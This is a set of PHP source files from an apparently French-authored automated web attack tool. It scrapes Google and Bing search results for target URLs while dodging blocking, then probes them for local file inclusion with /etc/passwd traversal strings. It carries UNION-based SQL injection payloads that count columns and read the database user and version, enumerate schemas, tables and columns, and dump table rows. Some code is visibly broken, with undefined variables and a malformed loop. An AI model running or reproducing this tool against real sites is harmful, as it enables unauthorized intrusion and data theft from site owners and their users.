 25 | 		$this->headers[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 26 | 		$this->headers[] = "Accept-Language: en-us,en;q=0.5";
 27 | 		$this->headers[] = "Pragma: ";
 28 | 	}
 29 | 	function getpagedata($url)
 30 | 	{
 31 | 		$ch = curl_init();
 32 | 		curl_setopt($ch, CURLOPT_URL, $url);
 33 | 		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 34 | 		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
 35 | 		curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1');
 36 | 		curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
 37 | 		curl_setopt($ch, CURLOPT_HTTPHEADER, $this->headers);
 38 | 		curl_setopt($ch, CURLOPT_COOKIEFILE,  $this->cookie);
 39 | 		curl_setopt($ch, CURLOPT_COOKIEJAR,  $this->cookie);
 40 | 		curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
 41 | 		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
 42 | 		$data = curl_exec($ch);
 43 | 		curl_close($ch);
 44 | 		return $data;
 45 | 	}
 46 | 	function pause() {
 47 | 		usleep(rand($this->time1, $this->time2));
 48 | 	}
 49 | 	function initGoogle() {
 50 | 		$data = $this->getpagedata('http://www.google.com');		//	Open google.com ( Might redirect to country specific site e.g. www.google.co.in)
 51 | 		$this->pause();
 52 | 		$this->getpagedata('http://www.google.com/ncr');	//	Moves back to google.com
 53 | 	}
 54 | 	// This function opens the preference page and saves the count for "Results per page" to 100
 55 | 	function setPreference() {
 56 | 		$data=$this->getpagedata('http://www.google.com/preferences?hl=en');
 57 | 		preg_match('/<input value="(.*?)" name="sig" type="hidden">/', $data, $matches);
 58 | 		$this->pause();
 59 | 		$mat = isset($matches[1]) ? urlencode($matches[1]) : '';
 60 | 		$this->getpagedata('http://www.google.com/setprefs?sig='.$mat.'&hl=en&lr=lang_en&safeui=images&suggon=2&newwindow=0&num=100&q=&prev=http%3A%2F%2Fwww.google.com%2F&submit2=Save+Preferences+');
 61 | 	}
 62 | 	function fetchUrlList()
 63 | 	{
 64 | 		for($i = 0; $i < 201; $i = $i + 100)
 65 | 		{
 66 | 			$data=$this->getpagedata('http://www.google.com/search?q='.$this->keyword.'&num=100&hl=en&biw=1280&bih=612&prmd=ivns&ei='.$this->ei.'&start='.$i.'&sa=N');
 67 | 			preg_match('/;ei=(.*?)&amp;ved/', $data, $matches);
 68 | 			$this->ei = @urlencode($matches[1]);
 69 | 			if ($data) {
 70 | 				if(preg_match("/sorry.google.com/", $data)) {
 71 | 					$this->errors[] = "You are blocked";
 72 | 					exit;
 73 | 				} else {
 74 | 					preg_match_all('@<h3\s*class="r">\s*<a[^<>]*href="([^<>]*)"[^<>]*>(.*)</a>\s*</h3>@siU', $data, $matches);
 75 | 					for ($j = 0; $j < count($matches[2]); $j++) {
 76 | 						$url = $matches[1][$j];
 77 | 						$url = $this->ext->RepareGog($url);
 78 | 						if ($this->ext->VerfierURL($url)) {
 79 | 							$this->urlList[] = $url;
 80 | 						}
 81 | 					}
 82 | 				}
 83 | 			}
 84 | 			else
 85 | 			{
 86 | 				$this->errors[] = 'Problem fetching the data';
 87 | 				exit;
 88 | 			}
 89 | 			$this->pause();
 90 | 		}
 91 | 	}
 92 | 	function getUrlList($keyword, $proxy='') {
 93 | 		$this->keyword=$keyword;
 94 | 		$this->proxy=$proxy;
 95 | 		$this->initGoogle();
 96 | 		$this->pause();
 97 | 		$this->setPreference();
 98 | 		$this->pause();
 99 | 		$this->fetchUrlList();
100 | 		return $this->urlList;
101 | 	}
102 | 	function google($dork, $page)
103 | 	{
104 | 		return $this->getUrlList($dork);
105 | 	}
106 | }
107 | class BingSearch {
108 | 
109 | 	function __construct(){
110 | 		parent::__construct();
111 | 		
112 | 		$this->preferences['results_per_page'] = 10;
113 | 	}
114 | 	
115 | 	private function setResultsPerPage($count){
116 | 	
117 | 		$count_allowed = array(10, 15, 30, 50);
118 | 		
119 | 		// open up the bing options page
120 | 		$html_form = $this->client->get("http://www.bing.com/account/web")->getBody();
121 | 		
122 | 		// parse various session values from that page
123 | 		preg_match_all('/<input[^>]*name="\b(guid|sid|ru|uid)\b"[^>]*value="(.*?)"/i', $html_form, $matches, PREG_SET_ORDER);
124 | 		
125 | 		if($matches){
126 | 			
127 | 			// change some of them
128 | 			$options = array(
129 | 				'rpp'		=> $count,
130 | 				'pref_sbmt'	=> 1,
131 | 			);
132 | 			
133 | 			foreach($matches as $match){
134 | 				$options[$match[1]] = $match[2];
135 | 			}
136 | 			
137 | 			// submit the form and get the cookie that determines the number of results per page
138 | 			$this->client->get("http://www.bing.com/account/web", array('query' => $options), array());
139 | 		}
140 | 		
141 | 	}
142 | 	
143 | 	// en-us, en-gb, it-IT, ru-RU...
144 | 	private function setSearchMarket($search_market){
145 | 		$body = $this->client->get("http://www.bing.com/account/worldwide")->getBody();
146 | 		
147 | 		if(preg_match('/<a href="([^"]*setmkt='.$search_market.'[^"]*)"/i', $body, $matches)){
148 | 
149 | 			$url = htmlspecialchars_decode($matches[1]);
150 | 			
151 | 			// this will set the session cookie
152 | 			$this->client->get($url);
153 | 		}
154 | 	}
155 | 	
156 | 	// override
157 | 	function setPreference($name, $value){
158 | 	
159 | 		if($name == 'search_market'){
160 | 			$this->setSearchMarket($value);
161 | 		}
162 | 		
163 | 		if($name == 'results_per_page'){
164 | 			$this->setResultsPerPage($value);
165 | 		}
166 | 
167 | 		parent::setPreference($name, $value);
168 | 	}
169 | 
170 | 	function extractResults($html){
171 | 	
172 | 		// ads ID=SERP,5417.1,Ads	ID=SERP,5106.1
173 | 		// bing local ID=SERP,5079.1 
174 | 		// bing local ID=SERP,5486.1
175 | 		
176 | 		// news ID=SERP,5371.1
177 | 		
178 | 		// result ID=SERP,5167.1
179 | 		// result ID=SERP,5151.1	
180 | 		
181 | 		preg_match_all('/<h3><a href="([^"]+)" h="ID=SERP,[0-9]{4}\.1"/', $html, $matches);
182 | 		
183 | 		return $matches ? $matches[1] : array();
184 | 	}
185 | 	
186 | 	function search($query, $page = 1){
187 | 	
188 | 		$sr = new SearchResponse();
189 | 		$start = ($page-1) * $this->preferences['results_per_page'] + 1;
190 | 		
191 | 			$response = $this->client->get("http://www.bing.com/search?q={$query}&first={$start}");
192 | 			
193 | 			// get HTML body
194 | 			$body = $response->getBody();
195 | 			$sr->html = $body;
196 | 			
197 | 			$sr->results = $this->extractResults($body);
198 | 			
199 | 			$sr->has_next_page = strpos($body, "\"sw_next\">Next") !== false;
200 | 		
201 | 		
202 | 		
203 | 		return $sr;
204 | 	}
205 | }
206 | 


--------------------------------------------------------------------------------
/request/sql/Scanneur.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class Scanneur
 3 | {
 4 | 	public function Scanne($array_url)
 5 | 	{
 6 | 		$resultat = '';
 7 | 		$nbr_elmt = count($array_url);
 8 | 		$e = '';
 9 | 		foreach ($array_url as $key => $url)
10 | 		{
11 | 			$e .= $url;
12 | 			if($url != '')
13 | 			{
14 | 				$this->SuprimerDansTrv($url);
15 | 				if($this->sql($url))
16 | 				{
17 | 					$resultat .= $url . '\r\n';
18 | 				}
19 | 			}
20 | 		}
21 | 		$_SESSION['erreur'] = $e;
22 | 		$this->SuprimerDansTrv('');
23 | 		return $resultat;
24 | 	}
25 | 
26 | 	private function SuprimerDansTrv($str)
27 | 	{
28 | 		if(($cle = array_search($str, $_SESSION['url_trouver'])) !== false)
29 | 		{
30 | 		    unset($_SESSION['url_trouver'][$cle]);
31 | 		}
32 | 	}
33 | 
34 | 	private function lfi($url)
35 | 	{
36 | 		$req = new Curl();
37 | 		$lfifound = 0;
38 | 		$lfi = array('/etc/passwd',
39 | 				'../etc/passwd',
40 | 				'../../etc/passwd',
41 | 				'../../../etc/passwd',
42 | 				'../../../../etc/passwd',
43 | 				'../../../../../etc/passwd',
44 | 				'../../../../../../etc/passwd',
45 | 				'../../../../../../../etc/passwd',
46 | 				'../../../../../../../../etc/passwd',
47 | 				'../../../../../../../../../etc/passwd',
48 | 				'../../../../../../../../../../etc/passwd',
49 | 				'/etc/passwd%00',
50 | 				'../etc/passwd%00',
51 | 				'../../etc/passwd%00',
52 | 				'../../../etc/passwd%00',
53 | 				'../../../../etc/passwd%00',
54 | 				'../../../../../etc/passwd%00',
55 | 				'../../../../../../etc/passwd%00',
56 | 				'../../../../../../../etc/passwd%00',
57 | 				'../../../../../../../../etc/passwd%00',
58 | 				'../../../../../../../../../etc/passwd%00',
59 | 				'../../../../../../../../../../etc/passwd%00');
60 | 
61 | 		$totallfi = count($lfi);
62 | 		for($i = 0; $i < $totallfi; $i++)
63 | 		{
64 | 			$url_t = $site.$lfi[$i];
65 | 			$page = $req->get($url_t);
66 | 			if (preg_match('/root/i',$page, $matches))
67 | 			{
68 | 				echo 'LFI trouver: $site$lfi[$i]<br>';
69 | 				$lfifound = 1;
70 | 			}
71 | 		}
72 | 		if ($lfifound == 0)
73 | 		{
74 | 			echo 'Pas de LFI trouver.<br>';
75 | 		}
76 | 	}
77 | 
78 | 	private function sql($url)
79 | 	{
80 | 		if (!strpos($url, '=') !== false)
81 |         {
82 |             return false;
83 |         }
84 |         else
85 |         {
86 |             $sqli = new sqli_check();
87 |             if($sqli->demmareAnalyseFast($url))
88 |             {
89 |                 return true;
90 |             }
91 |             else
92 |             {
93 |                 return false;
94 |             }
95 |         }
96 | 	}
97 | }
98 | 


--------------------------------------------------------------------------------
/request/sql/sqli_class/sqli_colonne.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class sqli_colonne
 3 | {
 4 | 	function __construct()
 5 | 	{
 6 | 		$this->hr = new Curl();
 7 | 		$this->ch = new chaine();
 8 | 	}
 9 |     private $syntax_count = '9136665621.9';
10 |     private $okstr = 'QUADCOREENGINE666';
11 |     private $var_n = '[t]';
12 |     private $hr;
13 |     private $ch;
14 | 
15 | 	public function Compter($param, $url_base, $union)
16 |     {
17 |         for ($p = 0; $p < count($param); $p++)
18 |         {
19 |             for ($i = 0; $i <= 60; $i++)
20 |             {
21 |                 $url_curr = $url_base . $this->ch->ViderDernierParam($this->ch->genParamParIndex($param, 0, ($p + 1))) .
22 | 	                $this->ch->Encode(str_replace($this->var_n, $this->GenSynHex($i), $union)) .
23 | 	                $this->ch->genParamParIndex($param, $p + 1, count($param)
24 |                 );
25 |                 $page = $this->hr->get($url_curr);
26 |                 if (strpos($page, $this->syntax_count) !== false)
27 |                 {
28 |                     return $i;
29 |                 }
30 |             }
31 |         }
32 |         return 0;
33 |     }
34 |     public function FindColonneVise($url, $maxColonne)
35 |     {
36 |         $chkstr = 'concat(0x217e21,' . $this->var_n . ',0x217e21)';//concat(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21)
37 |         $url_f = '';
38 |         $_url_base = explode('?', $url);
39 |         $_url_base = $_url_base[0];
40 |         $_url_params = explode('?', $url);
41 |         $_url_params = '?' . $_url_params[1];
42 | 
43 |         for ($i = 1; $i <= $maxColonne + 1; $i++) {
44 |             $param = $this->ch->Encode(str_replace($this->var_n, $this->ch->getHex($this->okstr), $chkstr));
45 | 			$url_f = str_replace(' ', '+', $_url_base . ( $this->str_replace_first($i, $param, $_url_params) ));
46 |             $page = $this->hr->get($url_f);
47 |             if (strpos($page, $this->okstr) !== false){
48 |                 return $i;
49 |             }
50 |             $page = '';
51 |         }
52 |         return -1;
53 |     }
54 |     private function GenSynHex($index)
55 |     {
56 |         $concat = '';
57 |         for ($i = 0; $i <= $index; $i++)
58 | 		{
59 |             $concat .= $this->ch->getHex($this->syntax_count) . ',';
60 | 		}
61 |         return rtrim($concat, ',');;
62 |     }
63 |     protected function str_replace_first($from, $to, $subject)
64 |     {
65 |         $from = '/'.preg_quote($from, '/').'/';
66 | 
67 |         return preg_replace($from, $to, $subject, 1);
68 |     }
69 | }
70 | 


--------------------------------------------------------------------------------
/request/sql/sqli_class/sqli_dump.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | class sqli_dump
  3 | {
  4 | 	public $separateur = '!~!';
  5 |     public $s_separateur = '3!P';
  6 |     public $var_n = '[t]';
  7 | 	public $url_point;
  8 |     private $hr;
  9 |     private $ch;
 10 | 
 11 |     function __construct()
 12 |     {
 13 |         $this->hr = new Curl();
 14 |         $this->ch = new chaine();
 15 |     }
 16 | 
 17 |     public function getFirst()
 18 |     {
 19 |         $inj = 'concat(' . $this->ch->getHex($this->separateur) . ',concat(user(),' . $this->ch->getHex($this->s_separateur) . ',version(),' . $this->ch->getHex($this->s_separateur) . ',database()),' . $this->ch->getHex($this->separateur) . ')';
 20 | 				$inj = $this->ch->Encode($inj);
 21 |         $url_g = str_replace($this->var_n, $inj, $this->url_point);
 22 |         $page = $this->hr->getA($url_g);
 23 | 
 24 |         if (strpos($page, $this->separateur) !== false){
 25 |             $rslt = $this->ch->extSubResult($this->s_separateur, $this->ch->extResult($this->separateur, $page));
 26 |             $hote = explode('/', $this->url_point);
 27 |             $ip = gethostbyname($hote[2]);
 28 | 			$arr = array(
 29 | 				'user' => $rslt[0],
 30 | 				'version' => $rslt[1],
 31 | 				'ip' => $ip,
 32 | 				'url_point' => $this->url_point,
 33 | 
 34 |                 'diagram' => array(
 35 |                     array('name' => $rslt[2], 'checked' => false, 'childs' => (object)array())
 36 |                 )
 37 | 			);
 38 |             return $arr;
 39 |         }
 40 |         else
 41 |         {
 42 |             return false;
 43 |         }
 44 |     }
 45 |     public function getAllDb()
 46 |     {
 47 |         $nbr = 0;
 48 |         try { $nbr = $this->getNombreDB(); }
 49 |         catch (Exception $e) { }
 50 |         $inj = '(select distinct concat(' . $this->ch->getHex($this->separateur) . ',group_concat(schema_name),' . $this->ch->getHex($this->separateur) . ') from information_schema.schemata where not schema_name=' . $this->ch->getHex('information_schema') . ')';
 51 | 				$inj = $this->ch->Encode($inj);
 52 |         $url_f = str_replace($this->var_n, $inj, $this->url_point);
 53 |         $page = $this->hr->get($url_f);
 54 |         $dbbrut = $this->ch->extResult($this->separateur, $page);
 55 | 
 56 |         if ($nbr > 1) {
 57 |             $a = explode(',', $dbbrut);
 58 | 			$b = array();
 59 | 			foreach ($a as $k => $v) {
 60 | 				$b[] = array('name' => $this->clearStr($v), 'checked' => false, 'childs' => array());
 61 | 			}
 62 | 			return $b;
 63 |         } else {
 64 | 			return array('name' => $dbbrut, 'checked' => false, 'childs' => array());
 65 |         }
 66 |     }
 67 |     public function getTable($db_name)
 68 |     {
 69 |         $nbr = 0;
 70 |         try { $nbr = $this->getNombreTable($db_name); }
 71 |         catch (Exception $e) { }
 72 |         $inj = '(select distinct concat(' . $this->ch->getHex($this->separateur) . ',unhex(Hex(cast(group_concat(table_name) as char))),' . $this->ch->getHex($this->separateur) . ') from information_schema.tables where table_schema=' . $this->ch->getHex($db_name) . ')';
 73 | 				$inj = $this->ch->Encode($inj);
 74 | 				$url_f = str_replace($this->var_n, $inj, $this->url_point);
 75 |         $page = $this->hr->get($url_f);
 76 |         $tablebrut = $this->ch->extResult($this->separateur, $page);
 77 | 
 78 |         if ($nbr > 1) {
 79 | 			$a = explode(',', $tablebrut);
 80 | 			$b = array();
 81 | 			foreach ($a as $k => $v) {
 82 | 				$b[] = array('name' => $this->clearStr($v)/*strip_tags($v)*/, 'checked' => false, 'childs' => array());
 83 | 			}
 84 | 			return $b;
 85 |         } else {
 86 | 		 	return array($tablebrut => array());
 87 |         }
 88 |     }
 89 |     public function getColonne($db_name, $table_name)
 90 |     {
 91 |     	$nbr = 0;
 92 |         try { $nbr = $this->getNombreColonne($db_name, $table_name); }
 93 |         catch (Exception $e) { }
 94 |         $inj = '(select distinct concat(' . $this->ch->getHex($this->separateur) . ',unhex(Hex(cast(group_concat(column_name) as char))),' . $this->ch->getHex($this->separateur) . ') from information_schema.columns where table_schema=' . $this->ch->getHex($db_name) . ' and table_name=' . $this->ch->getHex($table_name) . ')';
 95 |     	$inj = $this->ch->Encode($inj);
 96 |     	$url_f = str_replace($this->var_n, $inj, $this->url_point);
 97 |         $page = $this->hr->get($url_f);
 98 |         $colonnebrut = $this->ch->extResult($this->separateur, $page);
 99 | 
100 |         if ($nbr > 1) {
101 |     		$a = explode(',', $colonnebrut);
102 |     		$b = array();
103 |     		foreach ($a as $k => $v) {
104 |     			$b[] = array('name' => $this->clearStr($v), 'checked' => false, 'childs' => array());
105 |     		}
106 |     		return $b;
107 |         }
108 |         else
109 |         {
110 |     		return array($colonnebrut => array());
111 |         }
112 |     }
113 | 
114 | 	public function getDonnePremier($chemin_node)
115 |     {
116 |         foreach ($item as $chemin_node)
117 |         {
118 |             $mrc = explode('\\' ,$item);
119 |             if (count($mrc) > 2)
120 |             {
121 |                 $nbr_row = 0;
122 |                 $nbr_row = $this->getNombreDonne($mrc[0], $mrc[1]);
123 |                 $colonne = explode('[-COL]',  $mrc[2]);
124 | 				return array('');
125 |             }
126 |         }
127 |     }
128 | 
129 | 	public function getRow($db_name, $table_name, $colonne, $nbr_row)
130 | 	{
131 | 		$inj = "(select concat(" . $this->BuildQuery($colonne) . ") from " . $db_name . "." . $table_name . " limit " . $nbr_row . ",1)";
132 | 		$inj = $this->ch->Encode($inj);
133 |         $url_f = str_replace($this->var_n, $inj, $this->url_point);
134 | 
135 | 		$page = $this->hr->get($url_f);
136 | 
137 | 		$data = $this->ch->extResult($this->separateur, $page);
138 | 		$rL = explode($this->s_separateur, $data);
139 | 
140 | 		if ($this->checkAllEmpty($rL)){
141 |             return $rL;
142 | 		}
143 |         return $rL;
144 | 	}
145 |     private function checkAllEmpty($array)
146 |     {
147 |         foreach ($array as $item) {
148 |             if($item != '')
149 |                 return true;
150 |         }
151 |         return false;
152 |     }
153 |     private function BuildQuery($colonne)
154 |     {
155 |         $query_r = '';
156 |         $i = 0;
157 |         foreach ($colonne as $element)
158 |         {
159 |             if ($i == 0){
160 |                 $query_r .= $this->ch->getHex($this->separateur) . ",ifnull(" . $element . ",char(32)),";
161 |             }else if ($i == count($colonne) - 1){
162 |                 $query_r .= $this->ch->getHex($this->s_separateur) . ",ifnull(" . $element . ",char(32))," . $this->ch->getHex($this->separateur);
163 |             }else{
164 |                 $query_r .= $this->ch->getHex($this->s_separateur) . ",ifnull(" . $element . ",char(32)),";
165 |             }
166 |             $i++;
167 |         }
168 |         return $query_r;
169 |     }
170 | 	public function getNombreDonne($db_name, $tb_name)
171 |     {
172 | 		$inj = '(select concat(' . $this->ch->getHex($this->separateur) . ',count(0),' . $this->ch->getHex($this->separateur) . ') from ' . $db_name . '.' . $tb_name . ')';
173 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->url_point);
174 |         $page = $this->hr->get($url_f);
175 |         return intval($this->ch->extResult($this->separateur, $page));
176 |     }
177 |     private function getNombreColonne($db_name, $tb_name)
178 |     {
179 |         $inj = '(select concat(' . $this->ch->getHex($this->separateur) . ',count(0),' . $this->ch->getHex($this->separateur) . ') from information_schema.columns where table_schema=' . $this->ch->getHex($db_name) . ' and table_name='.$this->ch->getHex($tb_name).')';
180 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->url_point);
181 |         $page = $this->hr->get($url_f);
182 |         return intval($this->ch->extResult($this->separateur, $page));
183 |     }
184 |     private function getNombreTable($db_name)
185 |     {
186 |         $inj = '(select concat(' . $this->ch->getHex($this->separateur) . ',count(0),' . $this->ch->getHex($this->separateur) . ') from information_schema.tables where table_schema=' . $this->ch->getHex($db_name) . ')';
187 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->url_point);
188 |         $page = $this->hr->get($url_f);
189 |         return intval($this->ch->extResult($this->separateur, $page));
190 |     }
191 |     private function getNombreDB()
192 |     {
193 |         $inj = '(select concat(' . $this->ch->getHex($this->separateur) . ',count(0),' . $this->ch->getHex($this->separateur) . ') from information_schema.schemata where not schema_name=' . $this->ch->getHex('information_schema') . ')';
194 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->url_point);
195 |         $page = $this->hr->get($url_f);
196 |         return intval($this->ch->extResult($this->separateur, $page));
197 |     }
198 | 
199 |     private function clearStr($str)
200 |     {
201 |         if (strpos($str, '<') !== false) {
202 |             $m = explode('<', $str);
203 |             $str = current($m);
204 |         } else {
205 |             $str = $str;
206 |         }
207 | 
208 |         if (strpos($str, '>') !== false) {
209 |             $m = explode('>', $str);
210 |             $str = $m[1];
211 |         } else {
212 |             $str = $str;
213 |         }
214 |         return $str;
215 |     }  
216 | }
217 | 


--------------------------------------------------------------------------------
/request/sql/sqli_class/sqli_inject.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | class sqli_inject
  3 | {
  4 | 	function __construct() {
  5 | 		$this->hr = new Curl();
  6 | 		$this->ch = new chaine();
  7 | 	}
  8 | 	private $_url_originale;
  9 |     private $_url_base;
 10 |     private $_nbr_colonne;
 11 |     private $_colonne_point;
 12 |     private $_param = Array();
 13 |     private $hr;
 14 |     private $ch;
 15 |     private $baseI = '(select 1 from(select count(*),concat((select (select [t]) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)';
 16 |     private $separateur = '!~!';
 17 |     private $s_separateur = '~!';
 18 |     private $_union = array(
 19 |         '999999.9 union all select [t]',
 20 |         '999999.9 union all select [t]--',
 21 |         '999999.9\' union all select [t] and \'0\'=\'0',
 22 |         '999999.9" union all select [t] and "0"="0',
 23 |         '999999.9) union all select [t] and (0=0',
 24 |         '9\' and [t] \'1\'=1',
 25 |         '9\' or 1=[t] and \'1\'=1',
 26 |         '999999.9 union all select [t] #',
 27 |         '999999.9 union all select [t]-- #',
 28 |         '999999.9" union all select [t] and "0"="0 #',
 29 |         '999999.9\' union all select [t] and \'0\'=\'0 #',
 30 |         '999999.9) union all select [t] and (0=0) #',
 31 |     );
 32 | 
 33 | 	function uniqueAnalyse($url, $union)
 34 |     {
 35 |         $colonne = new sqli_colonne();
 36 |         $inj_point = '';
 37 |         $inj_point_curr = '';
 38 |         $_url_originale = $url;
 39 |         $_url_base = current(explode('?', $url));
 40 |         $this->_param = $this->ch->analyseParam($url);
 41 | 		$r = array();
 42 |         $_nbr_colonne = $colonne->Compter($this->_param, $_url_base, $union);
 43 |         $r['nbr_colonne'] = $_nbr_colonne;
 44 | 
 45 | 		$c_p = count($this->_param);
 46 |         for ($p = 0; $p <= $c_p; $p++) {
 47 |             $this->_colonne_point = $colonne->FindColonneVise(
 48 | 				$_url_base .
 49 |         		$this->ch->escapeParam($this->ch->genParamParIndex($this->_param, 0, $p + 1)) .
 50 |         		str_replace('[t]', $this->ch->genNbrColonneVise($_nbr_colonne, $this->_colonne_point), $union) .
 51 |         		$this->ch->genParamParIndex($this->_param, $p + 1, count($this->_param)), $_nbr_colonne
 52 | 			);
 53 | 
 54 |             $r['colonne_point'] = $this->_colonne_point;
 55 | 
 56 |             $inj_point = $_url_base . $this->ch->Encode($this->ch->escapeParam(
 57 | 				$this->ch->genParamParIndex($this->_param, 0, $p + 1)) .
 58 |       			str_replace('[t]', $this->ch->genNbrColonneVise($_nbr_colonne, $this->_colonne_point), $union) .
 59 |         		$this->ch->genParamParIndex($this->_param, $p + 1, count($this->_param))
 60 | 			);
 61 | 
 62 |             $inj_point_curr = str_replace(
 63 | 				'[t]', $this->ch->Encode('concat(' .
 64 |         		$this->ch->getHex($this->separateur) . ',concat(user(),' .
 65 |       			$this->ch->getHex($this->s_separateur) . ',version(),' . $this->ch->getHex($this->s_separateur) .
 66 |       			',database()),' . $this->ch->getHex($this->separateur) . ')'), $inj_point
 67 | 			);
 68 | 
 69 |             $page = $this->hr->get($inj_point_curr);
 70 | 
 71 |             if (strpos($page, $this->separateur) !== false || strpos($page, $this->s_separateur) !== false) {
 72 | 								$r['injection_point'] = $inj_point;
 73 |                 $r['data'] = 'Union used: ' . $union .'URL target builded find ==> "' . $inj_point . '""';
 74 | 								$r['found'] = true;
 75 |                 break;
 76 |             } else {
 77 |                 $r['data'] = 'Union: ' . $union .' Injection Failed';
 78 | 				$r['found'] = false;
 79 |             }
 80 |         }
 81 | 		return $r;
 82 |     }
 83 | 
 84 |     function autoAnalyse($url)
 85 |     {
 86 |         $vrf = new sqli_check();
 87 |         $colonne = new sqli_colonne();
 88 |         $inj_point = '';
 89 |         $inj_point_curr = '';
 90 |         $point_trv = false;
 91 |         $_url_originale = $url;
 92 |         $_url_base = current(explode('?', $url));
 93 |         $this->_param = $this->ch->analyseParam($url);
 94 | 		$r = array();
 95 |         $r['found'] = false;
 96 | 
 97 |         if ($vrf->demmareAnalyseFast($url) || $vrf->demmareAnalyseAvanced($url))
 98 |         {
 99 |             $u = 0; //Union Style 1
100 |             while (!$r['found'] && $u < count($this->_union))
101 |             {
102 |                 $_nbr_colonne = $colonne->Compter($this->_param, $_url_base, $this->_union[$u]);
103 |                 for ($p = 0; $p <= count($this->_param); $p++)
104 |                 {
105 |                 	//echo 'la ==><br>';
106 |                     $this->_colonne_point = $colonne->FindColonneVise(
107 |                         $_url_base .
108 |                     	$this->ch->escapeParam($this->ch->genParamParIndex($this->_param, 0, $p + 1)) .
109 |                     	str_replace('[t]', $this->ch->genNbrColonneVise($_nbr_colonne, $this->_colonne_point), $this->_union[$u]) .
110 |                     	$this->ch->genParamParIndex($this->_param, $p + 1, count($this->_param)), $_nbr_colonne
111 |                     );
112 |                     echo 'Colonne Vise ==>'.$this->_colonne_point.'<br>';
113 | 
114 |                     $inj_point = $_url_base . $this->ch->Encode(
115 |                         $this->ch->escapeParam($this->ch->genParamParIndex($this->_param, 0, $p + 1)) .
116 |                     	str_replace('[t]', $this->ch->genNbrColonneVise($_nbr_colonne, $this->_colonne_point), $this->_union[$u]) .
117 |                 		$this->ch->genParamParIndex($this->_param, $p + 1, count($this->_param))
118 |                     );
119 |                     echo '==>'.$inj_point.'<br>';
120 | 
121 |                     $inj_point_curr = str_replace('[t]', $this->ch->Encode('concat(' .
122 |                     		$this->ch->getHex($this->separateur) . ',concat(user(),' .
123 |                 			$this->ch->getHex($this->s_separateur) . ',version(),' . $this->ch->getHex($this->s_separateur) .
124 |                 			',database()),' . $this->ch->getHex($this->separateur) . ')'), $inj_point
125 |                     );
126 |                     echo '==>'.$inj_point_curr.'<br>';
127 | 
128 |                     $page = $this->hr->get($inj_point_curr);
129 |                     if (strpos($page, $this->separateur) !== false || strpos($page, $this->s_separateur) !== false)
130 |                     {
131 |                         $r['page_analyse'] = $page;
132 |                         $r['injection_point'] = $url_point;
133 |                         $r['found'] = true;
134 |                         $r['result_analyse'] = 'OK trouver ==> ' . $url_point;
135 |                         break;
136 |                     } else {
137 |                         $r['result_analyse'] = 'injection echouer pas de resultat ! <br>';
138 |                     }
139 |                 }
140 |                 $u++;
141 |             }
142 |         } else {
143 | 			$r['result_analyse'] = 'Injection echouer char';
144 |         }
145 |     }
146 | }
147 | 


--------------------------------------------------------------------------------